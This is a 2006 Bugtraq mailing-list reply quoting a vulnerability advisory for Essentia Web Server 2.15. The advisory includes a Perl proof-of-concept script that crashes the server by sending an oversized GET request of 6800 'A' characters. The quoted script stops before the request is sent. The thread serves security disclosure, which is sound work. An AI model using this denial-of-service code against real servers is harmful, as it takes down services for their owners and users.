Bugtraq mailing list archives
Re: [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow
From: Noam Rathaus <noamr () beyondsecurity com>
Date: Sun, 12 Nov 2006 18:51:13 +0200
Hi, Very old news, http://www.securiteam.com/windowsntfocus/5QP0R156AC.html, apparently it was never patched by the vendor. On Friday 10 November 2006 18:57, corrado.liotta () alice it wrote:
-=[--------------------ADVISORY-------------------]=- Essentia Web Server V 2.15 Author:CorryL x0n3-h4ck.org -=[-----------------------------------------------]=- -=[+] Application: Essentia Web Server -=[+] Version: 2.15 -=[+] Vendor's URL: http://www.essencomp.com -=[+] Platform: Windows -=[+] Bug type: Buffer overflow -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL ..::[ Descriprion ]::.. Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers. ..::[ Bug ]::.. This software is affection from a buffer overflow what it would allow an attacker to perform arbitrary code on the system victim. Sending a GET+Ax6800 request, he would succeed to write above the seh point. ..::[ Proof Of Concept ]::.. #!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts('h:', \%args); if (defined($args{'h'})) { $host = $args{'h'}; } print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n"; print STDERR "-=[ Discovered By CorryL corryl80 () gmail com ]=-\n"; print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n"; if (!defined($host)) { Usage(); } $dos = "A"x6800; print "[+] Connect to $host\n"; $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket; print "[+] Sending DOS byte\n"; $data = "GET /$dos \r\n\r\n"; ..::[ Workaround ]::.. nothing ..::[ Disclousure Timeline ]::.. [30/10/2006] - Vendor notification [04/11/2006] � No Vendor Response [04/11/2006] - Public disclousure
-- Noam Rathaus CTO 1616 Anderson Rd. McLean, VA 22102 Tel: 703.286.7725 extension 105 Fax: 888.667.7740 noamr () beyondsecurity com http://www.beyondsecurity.com
Current thread:
- [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow corrado . liotta (Nov 10)
- Re: [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow Noam Rathaus (Nov 13)